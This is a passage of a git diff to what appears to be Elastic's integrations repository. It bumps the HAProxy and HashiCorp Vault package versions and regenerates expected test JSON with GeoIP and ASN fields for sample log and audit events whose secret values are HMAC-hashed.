1.2.1 +version: 1.2.2 release: ga description: Collect audit reports from Google Workspaces with Elastic Agent. type: integration diff --git a/packages/haproxy/changelog.yml b/packages/haproxy/changelog.yml index 7d6139fa5f7..fec9f74369b 100644 --- a/packages/haproxy/changelog.yml +++ b/packages/haproxy/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.0.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log-expected.json b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log-expected.json index 196da4600dc..cf73530321f 100644 --- a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log-expected.json +++ b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log-expected.json @@ -25,12 +25,24 @@ "ip": "67.43.156.13" }, "source": { - "port": 40780, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", + "port": 40780, "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:28.354415600Z", + "ingested": "2021-12-14T14:46:40.578911001Z", "original": "Sep 20 15:42:59 67.43.156.13 haproxy[24551]: Connect from 67.43.156.13:40780 to 67.43.156.13:5000 (main/HTTP)", "category": [ "web", diff --git a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log-expected.json b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log-expected.json index a31e3387c80..0b61b0830fb 100644 --- a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log-expected.json +++ b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log-expected.json @@ -7,8 +7,20 @@ }, "temp": {}, "source": { - "port": 38862, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", + "port": 38862, "ip": "67.43.156.13" }, "url": { @@ -73,7 +85,7 @@ }, "event": { "duration": 2000000, - "ingested": "2021-12-09T13:39:28.437354700Z", + "ingested": "2021-12-14T14:46:40.692084383Z", "original": "Jul 30 09:03:52 localhost haproxy[32450]: 67.43.156.13:38862 [30/Jul/2018:09:03:52.726] incoming~ docs_microservice/docs 0/0/1/0/2 304 168 - - ---- 6/6/0/0/0 0/0 {docs.example.internal||} {|||} \"GET /component---src-pages-index-js-4b15624544f97cf0bb8f.js HTTP/1.1\"", "category": [ "web" @@ -146,7 +158,7 @@ }, "event": { "duration": 18000000, - "ingested": "2021-12-09T13:39:28.437363200Z", + "ingested": "2021-12-14T14:46:40.692086776Z", "original": "May 22 02:22:22 server1 haproxy[5089]: -:22222 [22/May/2021:02:22:22.222] www-https~ myapp/node2 site.domain.com 0/0/0/18/18 200 200 - - ---- 222/222/2/0/0 0/0 \"OPTIONS /api/v2/app/ HTTP/1.1\"", "category": [ "web" diff --git a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-httplog-no-headers.log-expected.json b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-httplog-no-headers.log-expected.json index 45cd17e2ffa..d853009c170 100644 --- a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-httplog-no-headers.log-expected.json +++ b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-httplog-no-headers.log-expected.json @@ -68,7 +68,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:28.671159700Z", + "ingested": "2021-12-14T14:46:40.952826309Z", "original": "Dec 10 12:01:46 voyager haproxy[19312]: 127.0.0.1:35982 [10/Dec/2018:12:01:46.395] http-webservices http-webservices/\u003cNOSRV\u003e 0/-1/-1/-1/0 503 213 - - SC-- 1/1/0/0/0 0/0 \"GET / HTTP/1.1\"", "category": [ "web" @@ -145,7 +145,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:28.671164Z", + "ingested": "2021-12-14T14:46:40.952829108Z", "original": "Dec 10 15:46:49 voyager haproxy[29785]: 127.0.0.1:43738 [10/Dec/2018:15:46:49.497] http-webservices http-webservices/\u003cNOSRV\u003e 0/-1/-1/-1/0 503 213 - - SC-- 1/1/0/0/0 0/0 {localhost:8888||} \"GET /foo HTTP/1.1\"", "category": [ "web" @@ -226,7 +226,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:28.671167600Z", + "ingested": "2021-12-14T14:46:40.952829521Z", "original": "Dec 10 15:48:56 voyager haproxy[7873]: 127.0.0.1:44542 [10/Dec/2018:15:48:56.017] http-webservices http-webservices/\u003cNOSRV\u003e 0/-1/-1/-1/0 503 213 - - SC-- 1/1/0/0/0 0/0 {localhost:8888||} {|} \"GET /foo HTTP/1.1\"", "category": [ "web" diff --git a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-tcplog.log-expected.json b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-tcplog.log-expected.json index 9804f966f39..a6d952789be 100644 --- a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-tcplog.log-expected.json +++ b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-tcplog.log-expected.json @@ -41,7 +41,7 @@ }, "event": { "duration": 1000000, - "ingested": "2021-12-09T13:39:29.001644200Z", + "ingested": "2021-12-14T14:46:41.298330789Z", "original": "Sep 20 15:44:23 127.0.0.1 haproxy[25457]: 127.0.0.1:40962 [20/Sep/2018:15:44:23.285] main app/\u003cNOSRV\u003e -1/-1/1 212 SC 1/1/0/0/0 0/0", "kind": "event" }, diff --git a/packages/haproxy/data_stream/log/fields/ecs.yml b/packages/haproxy/data_stream/log/fields/ecs.yml index 050ff60ac12..418948ab587 100644 --- a/packages/haproxy/data_stream/log/fields/ecs.yml +++ b/packages/haproxy/data_stream/log/fields/ecs.yml @@ -36,6 +36,8 @@ name: related.ip - external: ecs name: source.address +- external: ecs + name: source.as.number - external: ecs name: source.geo.city_name - external: ecs diff --git a/packages/haproxy/docs/README.md b/packages/haproxy/docs/README.md index 73befe87d3a..6bf6a918335 100644 --- a/packages/haproxy/docs/README.md +++ b/packages/haproxy/docs/README.md @@ -102,6 +102,7 @@ The `log` dataset collects the HAProxy application logs. | process.pid | Process id. | long | | related.ip | All of the IPs seen on your event. | ip | | source.address | Some event source addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | +| source.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | | source.geo.city_name | City name. | keyword | | source.geo.continent_name | Name of the continent. | keyword | | source.geo.country_iso_code | Country ISO code. | keyword | diff --git a/packages/haproxy/manifest.yml b/packages/haproxy/manifest.yml index 8fba23061e5..4b0c1b7130a 100644 --- a/packages/haproxy/manifest.yml +++ b/packages/haproxy/manifest.yml @@ -1,6 +1,6 @@ name: haproxy title: HAProxy -version: 1.0.1 +version: 1.0.2 description: Collect logs and metrics from HAProxy servers with Elastic Agent. type: integration icons: diff --git a/packages/hashicorp_vault/changelog.yml b/packages/hashicorp_vault/changelog.yml index 1c02934b57b..86ae5c409eb 100644 --- a/packages/hashicorp_vault/changelog.yml +++ b/packages/hashicorp_vault/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.2.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json b/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json index f8156983e31..a033d0919ec 100644 --- a/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json +++ b/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json @@ -55,10 +55,22 @@ ] }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:31.089175500Z", + "ingested": "2021-12-14T14:46:43.491199737Z", "original": "{\"time\":\"2020-12-01T20:29:04.356625452Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"display_name\":\"oidc-12349999999999999999\",\"policies\":[\"default\",\"group-admin\"],\"token_policies\":[\"default\",\"group-admin\"],\"metadata\":{\"account_id\":\"12349999999999999999\",\"email\":\"example@gmail.com\",\"role\":\"gmail\"},\"entity_id\":\"e4f5c67a-6f7e-789d-ae56-a1fe3ae23046\",\"token_type\":\"service\",\"token_ttl\":3600,\"token_issue_time\":\"2020-12-01T20:28:40Z\"},\"request\":{\"id\":\"cd09708b-11cc-2985-648b-cfe262cf7e50\",\"operation\":\"update\",\"mount_type\":\"system\",\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"client_token_accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"namespace\":{\"id\":\"root\"},\"path\":\"sys/capabilities-self\",\"data\":{\"paths\":[\"hmac-sha256:fd04b28916cb60f622b1ebce308b339b468f5da93fa735f985f4435049627a27\"]},\"remote_address\":\"67.43.156.13\"}}", "kind": "event", "action": "update", @@ -153,10 +165,22 @@ ] }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:31.089185200Z", + "ingested": "2021-12-14T14:46:43.491203315Z", "original": "{\"time\":\"2020-12-01T20:29:04.36089379Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"display_name\":\"oidc-12349999999999999999\",\"policies\":[\"default\",\"group-admin\"],\"token_policies\":[\"default\",\"group-admin\"],\"metadata\":{\"account_id\":\"12349999999999999999\",\"email\":\"example@gmail.com\",\"role\":\"gmail\"},\"entity_id\":\"e4f5c67a-6f7e-789d-ae56-a1fe3ae23046\",\"token_type\":\"service\",\"token_ttl\":3600,\"token_issue_time\":\"2020-12-01T20:28:40Z\"},\"request\":{\"id\":\"cd09708b-11cc-2985-648b-cfe262cf7e50\",\"operation\":\"update\",\"mount_type\":\"system\",\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"client_token_accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"namespace\":{\"id\":\"root\"},\"path\":\"sys/capabilities-self\",\"data\":{\"paths\":[\"hmac-sha256:fd04b28916cb60f622b1ebce308b339b468f5da93fa735f985f4435049627a27\"]},\"remote_address\":\"67.43.156.13\"},\"response\":{\"mount_type\":\"system\",\"data\":{\"capabilities\":[\"hmac-sha256:b77b79078c7bad1402a1ec74613454fd85efa203f1aa557fd2a9718cfd4ef367\",\"hmac-sha256:8d0bb80a69f442489908170e1831503c65b2f9d45a3250eac21fc16840416e5a\",\"hmac-sha256:c5086738f6225235066f69681e94111d94a45a268e9f0c64c6105073e32e8176\",\"hmac-sha256:3d439b7d92cbd8123fda8462716af05ae15710c8e2905eaba8d5452fccbad2f2\",\"hmac-sha256:5622a2d8fedf53e4671d6f371c59e40f3379030815fd4bb4126fdedce5fc87bb\"],\"secret/metadata/apps/github-runner/ca-cert\":[\"hmac-sha256:b77b79078c7bad1402a1ec74613454fd85efa203f1aa557fd2a9718cfd4ef367\",\"hmac-sha256:8d0bb80a69f442489908170e1831503c65b2f9d45a3250eac21fc16840416e5a\",\"hmac-sha256:c5086738f6225235066f69681e94111d94a45a268e9f0c64c6105073e32e8176\",\"hmac-sha256:3d439b7d92cbd8123fda8462716af05ae15710c8e2905eaba8d5452fccbad2f2\",\"hmac-sha256:5622a2d8fedf53e4671d6f371c59e40f3379030815fd4bb4126fdedce5fc87bb\"]}}}", "kind": "event", "action": "update", @@ -216,7 +240,7 @@ "ip": "10.6.8.34" }, "event": { - "ingested": "2021-12-09T13:39:31.089189500Z", + "ingested": "2021-12-14T14:46:43.491203857Z", "original": "{\"time\":\"2021-07-19T17:19:00.673898225Z\",\"type\":\"request\",\"auth\":{\"token_type\":\"default\"},\"request\":{\"id\":\"24ac580b-805a-d9ee-4d0d-7046932f4e05\",\"operation\":\"update\",\"mount_type\":\"pki\",\"client_token\":\"hmac-sha256:db417023d954a03aea8f56a3daf35460aa51920337420c7c22bcbb6b10852f23\",\"namespace\":{\"id\":\"root\"},\"path\":\"internal-ca/issue/internal-server\",\"data\":{\"alt_names\":\"hmac-sha256:9760c514cdbf3ec61fa8d375643f29a78640528ddbbef6a49053ef9de6251eee\",\"common_name\":\"hmac-sha256:bc800a949f7b2fe6401884da3a085de232365d7b508d741198fa2d88815f6d7c\",\"ip_sans\":\"hmac-sha256:b6d902ee3c49cae1cfa8c9172f649716f802a4186c686b813bd344077fe0b5b2\"},\"remote_address\":\"10.6.8.34\"},\"error\":\"permission denied\"}", "kind": "event", "action": "update", @@ -281,7 +305,7 @@ "ip": "10.6.8.34" }, "event": { - "ingested": "2021-12-09T13:39:31.089194600Z", + "ingested": "2021-12-14T14:46:43.491204264Z", "original": "{\"time\":\"2021-07-19T17:19:00.674663552Z\",\"type\":\"response\",\"auth\":{\"token_type\":\"default\"},\"request\":{\"id\":\"24ac580b-805a-d9ee-4d0d-7046932f4e05\",\"operation\":\"update\",\"mount_type\":\"pki\",\"client_token\":\"hmac-sha256:db417023d954a03aea8f56a3daf35460aa51920337420c7c22bcbb6b10852f23\",\"namespace\":{\"id\":\"root\"},\"path\":\"internal-ca/issue/internal-server\",\"data\":{\"alt_names\":\"hmac-sha256:9760c514cdbf3ec61fa8d375643f29a78640528ddbbef6a49053ef9de6251eee\",\"common_name\":\"hmac-sha256:bc800a949f7b2fe6401884da3a085de232365d7b508d741198fa2d88815f6d7c\",\"ip_sans\":\"hmac-sha256:b6d902ee3c49cae1cfa8c9172f649716f802a4186c686b813bd344077fe0b5b2\"},\"remote_address\":\"10.6.8.34\"},\"response\":{\"mount_type\":\"pki\",\"data\":{\"error\":\"hmac-sha256:409ef1533baffc8e15cd4424780c9aba5d10f168b8d641f111da43e7955451fa\"}},\"error\":\"1 error occurred:\\n\\t* permission denied\\n\\n\"}", "kind": "event", "action": "update", @@ -356,7 +380,7 @@ "ip": "10.6.8.36" }, "event": { - "ingested": "2021-12-09T13:39:31.089198700Z", + "ingested": "2021-12-14T14:46:43.491204651Z", "original": "{\"time\":\"2021-06-29T17:26:11.402530449Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:95b624915ff8dd55a4028bb57d1af8c6d487a99033b507b99a5a6e943b4933ef\",\"accessor\":\"hmac-sha256:8fa4f7f3d1fd812064950025cde2b1565829a9dc5075253399e5ede8f8a1d98e\",\"display_name\":\"token-375f9cb3-4355-42c7-eab5-029f8a310ca7-runner\",\"policies\":[\"app-continuous-delivery\",\"app-github-runner\",\"default\"],\"token_policies\":[\"app-continuous-delivery\",\"app-github-runner\",\"default\"],\"metadata\":{\"AllocationID\":\"375f9cb3-4355-42c7-eab5-029f8a310ca7\",\"Namespace\":\"\",\"NodeID\":\"b70676cb-731b-976b-edc4-a5b1bb963fe4\",\"Task\":\"runner\"},\"token_type\":\"service\",\"token_ttl\":259200,\"token_issue_time\":\"2021-04-29T21:53:46Z\"},\"request\":{\"id\":\"0042ad1b-1400-7eb7-5e25-1dfc898c1998\",\"operation\":\"read\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:95b624915ff8dd55a4028bb57d1af8c6d487a99033b507b99a5a6e943b4933ef\",\"client_token_accessor\":\"hmac-sha256:8fa4f7f3d1fd812064950025cde2b1565829a9dc5075253399e5ede8f8a1d98e\",\"namespace\":{\"id\":\"root\"},\"path\":\"secret/data/apps/continuous-delivery/aws-bucket-sse-c\",\"remote_address\":\"10.6.8.36\"}}", "kind": "event", "action": "read", @@ -454,7 +478,7 @@ "ip": "10.6.8.36" }, "event": { - "ingested": "2021-12-09T13:39:31.089204100Z", + "ingested": "2021-12-14T14:46:43.491205082Z", "original": "{\"time\":\"2021-06-29T17:26:11.409840527Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:95b624915ff8dd55a4028bb57d1af8c6d487a99033b507b99a5a6e943b4933ef\",\"accessor\":\"hmac-sha256:8fa4f7f3d1fd812064950025cde2b1565829a9dc5075253399e5ede8f8a1d98e\",\"display_name\":\"token-375f9cb3-4355-42c7-eab5-029f8a310ca7-runner\",\"policies\":[\"app-continuous-delivery\",\"app-github-runner\",\"default\"],\"token_policies\":[\"app-continuous-delivery\",\"app-github-runner\",\"default\"],\"metadata\":{\"AllocationID\":\"375f9cb3-4355-42c7-eab5-029f8a310ca7\",\"Namespace\":\"\",\"NodeID\":\"b70676cb-731b-976b-edc4-a5b1bb963fe4\",\"Task\":\"runner\"},\"token_type\":\"service\",\"token_ttl\":259200,\"token_issue_time\":\"2021-04-29T21:53:46Z\"},\"request\":{\"id\":\"0042ad1b-1400-7eb7-5e25-1dfc898c1998\",\"operation\":\"read\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:95b624915ff8dd55a4028bb57d1af8c6d487a99033b507b99a5a6e943b4933ef\",\"client_token_accessor\":\"hmac-sha256:8fa4f7f3d1fd812064950025cde2b1565829a9dc5075253399e5ede8f8a1d98e\",\"namespace\":{\"id\":\"root\"},\"path\":\"secret/data/apps/continuous-delivery/aws-bucket-sse-c\",\"remote_address\":\"10.6.8.36\"},\"response\":{\"mount_type\":\"kv\",\"data\":{\"data\":{\"customer_key\":\"hmac-sha256:85d3c6e705ea04f49772b92cc7335e34c53f0264a6d75bba3ab95bad22ca5bd1\"},\"metadata\":{\"created_time\":\"hmac-sha256:9c910646d7399704ee015b4247b374bfb950282339d902a221b1ff4c83b13ee7\",\"deletion_time\":\"hmac-sha256:17a84bc5c1c7ee851af0069663ab9de3c879107724470fa34fc0b5418fb653db\",\"destroyed\":false,\"version\":1}}}}", "kind": "event", "action": "read", @@ -536,7 +560,7 @@ "ip": "10.6.8.34" }, "event": { - "ingested": "2021-12-09T13:39:31.089259300Z", + "ingested": "2021-12-14T14:46:43.491205470Z", "original": "{\"time\":\"2021-06-29T18:01:29.545476939Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:f69c28fde8609df2a0ec6a316c0293179fa922a8a3a660a314859e6cff8e5fef\",\"accessor\":\"hmac-sha256:2ee197e25b333d83ba45d0c40aca153e0ad6c9e42b04b6de6a5b5b575de58771\",\"display_name\":\"token-c1d6c089-2f46-ff11-5988-38636bddf8d9-homeassistant\",\"policies\":[\"app-home-assistant\",\"default\"],\"token_policies\":[\"app-home-assistant\",\"default\"],\"metadata\":{\"AllocationID\":\"c1d6c089-2f46-ff11-5988-38636bddf8d9\",\"Namespace\":\"\",\"NodeID\":\"a28cef3a-f9e6-ad7d-bc5f-2c5ac27eec51\",\"Task\":\"homeassistant\"},\"token_type\":\"service\",\"token_ttl\":259200,\"token_issue_time\":\"2021-06-24T21:22:03Z\"},\"request\":{\"id\":\"3aa3f349-b55a-53e3-a795-dd4137d64299\",\"operation\":\"read\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:f69c28fde8609df2a0ec6a316c0293179fa922a8a3a660a314859e6cff8e5fef\",\"client_token_accessor\":\"hmac-sha256:2ee197e25b333d83ba45d0c40aca153e0ad6c9e42b04b6de6a5b5b575de58771\",\"namespace\":{\"id\":\"root\"},\"path\":\"secret/data/apps/home-assistant/secrets_yaml\",\"remote_address\":\"10.6.8.34\"}}", "kind": "event", "action": "read", @@ -662,7 +686,7 @@ "ip": "10.6.8.34" }, "event": { - "ingested": "2021-12-09T13:39:31.089265900Z", + "ingested": "2021-12-14T14:46:43.491205856Z", "original": "{\"time\":\"2021-06-29T18:01:29.547355273Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:f69c28fde8609df2a0ec6a316c0293179fa922a8a3a660a314859e6cff8e5fef\",\"accessor\":\"hmac-sha256:2ee197e25b333d83ba45d0c40aca153e0ad6c9e42b04b6de6a5b5b575de58771\",\"display_name\":\"token-c1d6c089-2f46-ff11-5988-38636bddf8d9-homeassistant\",\"policies\":[\"app-home-assistant\",\"default\"],\"token_policies\":[\"app-home-assistant\",\"default\"],\"metadata\":{\"AllocationID\":\"c1d6c089-2f46-ff11-5988-38636bddf8d9\",\"Namespace\":\"\",\"NodeID\":\"a28cef3a-f9e6-ad7d-bc5f-2c5ac27eec51\",\"Task\":\"homeassistant\"},\"token_type\":\"service\",\"token_ttl\":259200,\"token_issue_time\":\"2021-06-24T21:22:03Z\"},\"request\":{\"id\":\"3aa3f349-b55a-53e3-a795-dd4137d64299\",\"operation\":\"read\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:f69c28fde8609df2a0ec6a316c0293179fa922a8a3a660a314859e6cff8e5fef\",\"client_token_accessor\":\"hmac-sha256:2ee197e25b333d83ba45d0c40aca153e0ad6c9e42b04b6de6a5b5b575de58771\",\"namespace\":{\"id\":\"root\"},\"path\":\"secret/data/apps/home-assistant/secrets_yaml\",\"remote_address\":\"10.6.8.34\"},\"response\":{\"mount_type\":\"kv\",\"data\":{\"data\":{\"aladdin_connect_password\":\"hmac-sha256:f3a85a98373fa879041a438606e38773fdfaca9d99e2a1ee08183a2cb8fc9a17\",\"aladdin_connect_username\":\"hmac-sha256:b3c982a71d17164325f4ef6a9831a132e1bb789833fc6d1ecab5d36bc71df112\",\"elasticsearch_password\":\"hmac-sha256:8d2328e2c80428977858c0a80c6624c7910dd7da0b74c8d33e4d8d22fc0e9ad1\",\"elasticsearch_url\":\"hmac-sha256:c63aa2b5d15069aa9ff53eb1b6f4418a21a87c4fe508655d7f396b4bdf73492c\",\"elasticsearch_username\":\"hmac-sha256:bb7bdfaa02957aaf85efd2ea4585e05aa1ccb4594eb6820078bf8df46d123133\",\"rest_notify_cisco_phone_csrc_token\":\"hmac-sha256:b2120f2e905e41167ea380586d9f1bb13772873bb3e35aba28daca747921faad\",\"rest_notify_cisco_phone_password\":\"hmac-sha256:a4c3451df78d28825309c3b25fefb6fdb9314350da1169b012923325929d2b5d\",\"rest_notify_cisco_phone_username\":\"hmac-sha256:1229909bcdaa7acf6894ebfa51daff701b9f026f7bfff5525fe7ddfcf8469af6\",\"smtp_host\":\"hmac-sha256:bf4e6e6f4b1af3beb385006278b7e2da94eb4b243af8738727ba5e82375138c5\",\"smtp_password\":\"hmac-sha256:7b8a462d76578b0e4ddf162d9a244eb5a736d3d04b21d9ed399ad7f44032743e\",\"smtp_port\":587,\"smtp_username\":\"hmac-sha256:d97eb233a52d67e2fb16b43950b8537659b69a13e03aa58a771d8e82379354e4\",\"twilio_account_sid\":\"hmac-sha256:509150eeaf7657a069a37df450fe5821b307a882a2634230edf0b8b172f2fca8\",\"twilio_auth_token\":\"hmac-sha256:09cf3ffa023a5b5750d0aaff696f767b5a00c1af430b297abdc84d53dd4d139e\",\"cam_backyard_rtsp_url\":\"hmac-sha256:bcac97c20cdc641ca7ba4d1e4c80246961f6f116670ce6ae32be1a01be36fed1\",\"cam_backyard_url\":\"hmac-sha256:5a9348e779c7260e4375a734a4947506e97f86098e45db8d63ba800698d26c34\",\"cam_basement_door_rtsp_url\":\"hmac-sha256:ffd1f989ed0632e542f760ae8e683852e6d4b22acb24b5eae94e1568e977b007\",\"cam_basement_door_url\":\"hmac-sha256:550f62496448494a4a30a4c8499903ea58ea7ab43102a56103020c122795861b\",\"cam_driveway_rtsp_url\":\"hmac-sha256:7b732f13b417be1d8387dc9c517087cd2f9a854898f8bd50922ae39c9123cf5f\",\"cam_driveway_url\":\"hmac-sha256:aef04b9fc7c345e7cb49f3833fbe0d56c8d8c6c6d922152250019f83bfc38acc\",\"cam_front_door_rtsp_url\":\"hmac-sha256:db5ef5a052e6d09fee199dede89f5178afd5f642843268aa5bb43e755785f916\",\"cam_front_door_url\":\"hmac-sha256:6b5129afbd2e43f8ac8fe25a0b7c27f69c19d8713a95ac98ebfa65c8e51fd089\",\"cam_garage_rtsp_url\":\"hmac-sha256:10aa878ec26fdfa5e3a486ead013c693425f5c6bd3315b9365132a0c963c30f6\",\"cam_garage_url\":\"hmac-sha256:80d5c5b1080b12ed3681806bcc560f2ff0f53a43549df72396b14f41d1871dbf\",\"cam_mechanical_room_rtsp_url\":\"hmac-sha256:e343a772988cbc3262c6256df08c0c9f1a0f50e3bcefe3f39febc7cb135e2132\",\"cam_mechanical_room_url\":\"hmac-sha256:fd1f4d286bebd86234c474580cc2a74fdb79b16d936e4b8562e5cc13d82fbf7b\",\"cam_os_password\":\"hmac-sha256:b428f7bdeb97348f2553143030dfb1ac3b714436b59ed74e3320af2e13b5919f\",\"cam_os_username\":\"hmac-sha256:ff23e0d8782523b6a57c1bc1d21f88ef451359d7acefb032864e7a2715ba4185\",\"yale_lock_code_andrew\":\"hmac-sha256:545bca27b7805c8f17433693e8a07dab5c8b9d07a9a0e99ba04d73917c882956\",\"yale_lock_code_neva\":\"hmac-sha256:954080fe6c36dddfecea03fe20c91fa75d1c54488c1c706c988650dd0c45647e\",\"zwave_network_key\":\"hmac-sha256:382cc81146b9b71dc62135d6fb97246c74818857f3a73b03e7f7367ea53a8336\"},\"metadata\":{\"created_time\":\"hmac-sha256:be77f81a3338087479da238bf04ab23998c11375bc830cdeca8e30c24ab8a095\",\"deletion_time\":\"hmac-sha256:17a84bc5c1c7ee851af0069663ab9de3c879107724470fa34fc0b5418fb653db\",\"destroyed\":false,\"version\":6}}}}", "kind": "event", "action": "read", diff --git a/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-faked-all-fields.log-expected.json b/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-faked-all-fields.log-expected.json index 266b1cdf818..afdaa68d53f 100644 --- a/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-faked-all-fields.log-expected.json +++ b/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-faked-all-fields.log-expected.json @@ -48,7 +48,7 @@ "ip": "172.17.0.1" }, "event": { - "ingested": "2021-12-09T13:39:31.476462Z", + "ingested": "2021-12-14T14:46:43.994434636Z", "original": "{\"time\":\"2018-04-09T21:04:29.6406536Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:eb3da855a3fb8b1c3574064f7edd080a97c4ebcf4a8e6674126710915fe464ae\",\"accessor\":\"hmac-sha256:f5a8798113bb65c0676abb3eef5ca5482c0c7daac38da36d402282a5414fcf3d\",\"display_name\":\"token\",\"policies\":[\"default\",\"sudo\",\"surf-admin\"],\"metadata\":{\"loglevel\":\"raw\",\"remote\":\"false\",\"surf\":\"moderate\"},\"entity_id\":\"\"},\"request\":{\"id\":\"b2f72168-6cba-1bab-808a-72d9304b82f8\",\"operation\":\"read\",\"client_token\":\"hmac-sha256:eb3da855a3fb8b1c3574064f7edd080a97c4ebcf4a8e6674126710915fe464ae\",\"client_token_accessor\":\"hmac-sha256:f5a8798113bb65c0676abb3eef5ca5482c0c7daac38da36d402282a5414fcf3d\",\"path\":\"auth/token/lookup-self\",\"data\":null,\"policy_override\":false,\"remote_address\":\"172.17.0.1\",\"wrap_ttl\":0,\"headers\":{}},\"error\":\"\"}", "kind": "event", "action": "read", @@ -143,7 +143,7 @@ "ip": "172.17.0.1" }, "event": { - "ingested": "2021-12-09T13:39:31.476471Z", + "ingested": "2021-12-14T14:46:43.994437407Z", "original": "{\"time\":\"2018-04-09T21:04:29.6420203Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:eb3da855a3fb8b1c3574064f7edd080a97c4ebcf4a8e6674126710915fe464ae\",\"accessor\":\"hmac-sha256:f5a8798113bb65c0676abb3eef5ca5482c0c7daac38da36d402282a5414fcf3d\",\"display_name\":\"token\",\"policies\":[\"default\",\"sudo\",\"surf-admin\"],\"metadata\":{\"loglevel\":\"raw\",\"remote\":\"false\",\"surf\":\"moderate\"},\"entity_id\":\"\"},\"request\":{\"id\":\"b2f72168-6cba-1bab-808a-72d9304b82f8\",\"operation\":\"read\",\"client_token\":\"hmac-sha256:eb3da855a3fb8b1c3574064f7edd080a97c4ebcf4a8e6674126710915fe464ae\",\"client_token_accessor\":\"hmac-sha256:f5a8798113bb65c0676abb3eef5ca5482c0c7daac38da36d402282a5414fcf3d\",\"path\":\"auth/token/lookup-self\",\"data\":null,\"policy_override\":false,\"remote_address\":\"172.17.0.1\",\"wrap_ttl\":0,\"headers\":{}},\"response\":{\"data\":{\"accessor\":\"hmac-sha256:f5a8798113bb65c0676abb3eef5ca5482c0c7daac38da36d402282a5414fcf3d\",\"creation_time\":1523307682,\"creation_ttl\":180000000,\"display_name\":\"hm